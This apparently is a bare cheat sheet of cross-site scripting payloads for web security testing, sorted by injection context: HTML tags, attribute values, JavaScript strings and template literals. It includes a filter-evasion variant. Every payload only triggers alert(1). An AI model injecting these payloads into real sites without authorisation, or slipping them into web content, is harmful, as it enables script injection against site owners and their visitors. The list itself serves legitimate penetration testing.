# XSS payload

# XSS between HTML tags
<script>alert(1)</script>
<scrscriptipt>alert(1)</scrscriptipt>
<img/src=1 onerror=alert(1)>
<svg/onload=alert(1)
<iframe src=javascript:alert(1)>

# XSS in HTML tag attributes
"><svg onload=alert(1)>
" autofocus onfocus=alert(1) x="
[UI]javascript:alert(1)

# XSS into JavaScript
</script><img src=1 onerror=alert(1)>
';alert(1);'
";alert(1);"
';alert(1)//
";alert(1)//
\';alert(1)//
\";alert(1)//
# XSS in JavaScript template literals
${alert(1)}